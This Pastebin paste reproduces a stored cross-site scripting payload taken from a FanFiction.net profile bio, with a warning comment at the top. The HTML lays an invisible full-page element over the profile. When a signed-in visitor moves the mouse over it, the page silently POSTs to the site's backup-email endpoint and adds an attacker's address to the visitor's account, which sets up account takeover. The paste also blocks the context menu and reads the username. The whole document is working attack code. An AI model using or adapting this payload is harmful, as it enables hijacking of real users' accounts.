Advertisement
Trambelus

FF.net exploit bio

Oct 22nd, 2018
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 3.19 KB | None | 0 0
  1. <!-- Source: http://www.fanfiction.net/u/11332324/Varangue-73
  2.     USE CAUTION WHEN VISITING THIS LINK; it contains an active XSS exploit.
  3.     If you're signed into FF, it may compromise your account security.
  4. -->
  5.  
  6. <div id=bio style='padding-left:5px;padding-right:5px;'>
  7.     <li class="gui_normal"
  8.        style="
  9.            position: absolute;
  10.            background-color: #FFFFFF;
  11.            width: 100%;
  12.            height:100%;
  13.            top:0;
  14.            left:0;
  15.            list-style-type: none;"
  16.        onmouseover="
  17.            var url = 'https://www.fanfiction.net/account/backup_emails.php';
  18.            var params = 'action=add'.concat('%26email=actorzero@countermail.com');
  19.            var req = new XMLHttpRequest();
  20.            req.open('POST', url, true);
  21.            req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  22.            req.send(params);"
  23.        onclick="
  24.            document.querySelector('.lc-wrapper').remove();
  25.            var username = document.getElementById('name_login').innerText;
  26.            console.log(username);"
  27.        touchstart=""
  28.        touchmove=""
  29.        touchend=""
  30.        oncontextmenu="
  31.            return false;"
  32.        >
  33.     </li>
  34.     <li style="
  35.            position: absolute;
  36.            width: 96%;
  37.            background-color: #F6F7EE;
  38.            color: #000000;
  39.            padding: 10px;
  40.            border: 1px outset;
  41.            margin-bottom: 5px;
  42.            text-align: left;
  43.            top: 0;
  44.            left: 0.5;
  45.            list-style-type: none;"
  46.        onmouseover="
  47.            var url = 'https://www.fanfiction.net/account/backup_emails.php';
  48.            var params = 'action=add'.concat('%26email=actorzero@countermail.com');
  49.            var req = new XMLHttpRequest();
  50.            req.open('POST', url, true);
  51.            req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  52.            req.send(params);"
  53.        onclick="
  54.            document.querySelector('.lc-wrapper').remove();
  55.            var username = document.getElementById('name_login').innerText;
  56.            console.log(username);"
  57.        oncontextmenu="
  58.            return false;"
  59.        >
  60.             FanFiction.Net Message Type 1
  61.     </li>
  62.     <p>horizontal line</p>
  63.     <li style="position: absolute; width: 96%; background-color: #F6F7EE; color: #000000; padding: 10px; border: 1px outset; margin-bottom: 5px; text-align: left; top: 2.9em; left: 0.5; list-style-type: none;"
  64.        onmouseover="
  65.            var url = 'https://www.fanfiction.net/account/backup_emails.php';
  66.            var params = 'action=add'.concat('%26email=actorzero@countermail.com');
  67.            var req = new XMLHttpRequest();
  68.            req.open('POST', url, true);
  69.            req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  70.            req.send(params);"
  71.        onclick="
  72.            document.querySelector('.lc-wrapper').remove();
  73.            var username = document.getElementById('name_login').innerText;
  74.            console.log(username);"
  75.        oncontextmenu="return false;">
  76.             User is no longer an active member.
  77.     </li>
  78.     <p>Test. PoC</p>
  79. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement